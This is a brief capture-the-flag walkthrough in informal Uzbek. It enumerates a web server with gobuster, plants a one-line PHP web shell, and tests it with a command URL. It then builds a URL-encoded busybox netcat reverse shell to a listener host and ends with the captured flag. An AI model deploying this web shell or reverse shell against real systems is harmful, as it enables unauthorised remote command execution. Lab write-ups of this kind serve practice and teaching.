bu yerda bizga kkli narsa yoq gobuster qilib web pagelarni scaner qilib koramz
bu yerda endi new dir yaratamz uni icda payload joylaymz maslana shell.php deb yaratamz
<?php system($_GET['cmd']); ?>
save qilamz va brauzer orqali iwlayabtimi yoqmi tekwramz
http://192.168.0.102/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
demak payload iwlayabti endi shu orqali reversshell olib koramz
echo -n 'busybox nc 192.168.0.104 1414 -e /bin/sh' | jq -sRr @uri
busybox%20nc%20%20192.168.0.104%20-e%20%2Fbin%2Fsh
bu orqali decode qilb olamz
/home/user.txt icida flag bor 3f2580ab16ac82c9e0adaf0dad3a900d